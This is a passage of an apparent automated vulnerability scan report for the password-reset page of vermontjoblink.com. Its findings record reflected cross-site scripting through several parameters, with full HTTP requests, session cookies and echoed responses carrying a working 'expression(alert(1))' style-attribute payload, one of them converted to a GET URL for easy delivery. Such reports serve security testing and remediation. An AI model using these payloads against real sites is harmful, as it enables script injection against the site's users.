Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&FormName=Form02bbf0"style%3d"x%3aexpression(alert(1))"34e6cd92313

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:55'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="formname_error" value="Form02bbf0"style="x:expression(alert(1))"34e6cd92313" class="cfTransparent" />
...[SNIP]...

3.129. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [OLD_CHOICE_prev parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the OLD_CHOICE_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dca44"style%3d"x%3aexpression(alert(1))"42ce90c0891 was submitted in the OLD_CHOICE_prev parameter. This input was echoed as dca44"style="x:expression(alert(1))"42ce90c0891 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
53Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=&RAND_prev=1902&BLTEXTBOXEXTRADONOTUSE1_prev=&OLD_CHOICE_prev=2dca44"style%3d"x%3aexpression(alert(1))"42ce90c0891&FORMID_prev=10&SECURITYSYS_prev=on&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:05 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:05'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="old_choice" value="2dca44"style="x:expression(alert(1))"42ce90c0891" class="cfTransparent" />
...[SNIP]...

3.130. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [RAND_prev parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the RAND_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8a7"style%3d"x%3aexpression(alert(1))"c44cab2e4c1 was submitted in the RAND_prev parameter. This input was echoed as 1c8a7"style="x:expression(alert(1))"c44cab2e4c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=&RAND_prev=19021c8a7"style%3d"x%3aexpression(alert(1))"c44cab2e4c1&BLTEXTBOXEXTRADONOTUSE1_prev=&OLD_CHOICE_prev=2&FORMID_prev=10&SECURITYSYS_prev=on&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:59'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="rand" value="19021c8a7"style="x:expression(alert(1))"c44cab2e4c1" class="cfTransparent" />
...[SNIP]...

3.131. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [SECURITYSYS_prev parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the SECURITYSYS_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de510"style%3d"x%3aexpression(alert(1))"dcaa05356ba was submitted in the SECURITYSYS_prev parameter. This input was echoed as de510"style="x:expression(alert(1))"dcaa05356ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=&RAND_prev=1902&BLTEXTBOXEXTRADONOTUSE1_prev=&OLD_CHOICE_prev=2&FORMID_prev=10&SECURITYSYS_prev=onde510"style%3d"x%3aexpression(alert(1))"dcaa05356ba&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:10 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:10'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="securitysys" value="onde510"style="x:expression(alert(1))"dcaa05356ba" class="cfTransparent" />
...[SNIP]...

3.132. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [U_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the U_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daaf8"style%3d"x%3aexpression(alert(1))"801d98fbf25 was submitted in the U_name parameter. This input was echoed as daaf8"style="x:expression(alert(1))"801d98fbf25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yesdaaf8"style%3d"x%3aexpression(alert(1))"801d98fbf25&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:35'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="u_name_error" value="yesdaaf8"style="x:expression(alert(1))"801d98fbf25" class="cfTransparent" />
...[SNIP]...

3.133. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [bltextboxextradonotuse1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the bltextboxextradonotuse1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22113"style%3d"x%3aexpression(alert(1))"293bf60f081 was submitted in the bltextboxextradonotuse1 parameter. This input was echoed as 22113"style="x:expression(alert(1))"293bf60f081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=22113"style%3d"x%3aexpression(alert(1))"293bf60f081&FORMNAME_prev=Form0&CHOICE_prev=2&ERRORFIELDS_prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:48'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="bltextboxextradonotuse1_error" value="22113"style="x:expression(alert(1))"293bf60f081" class="cfTransparent" />
...[SNIP]...

3.134. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [bltextboxextradonotuse1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the bltextboxextradonotuse1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa244"style%3d"x%3aexpression(alert(1))"619b41b3cda6e8e06 was submitted in the bltextboxextradonotuse1 parameter. This input was echoed as aa244"style="x:expression(alert(1))"619b41b3cda6e8e06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=aa244"style%3d"x%3aexpression(alert(1))"619b41b3cda6e8e06&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:06 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
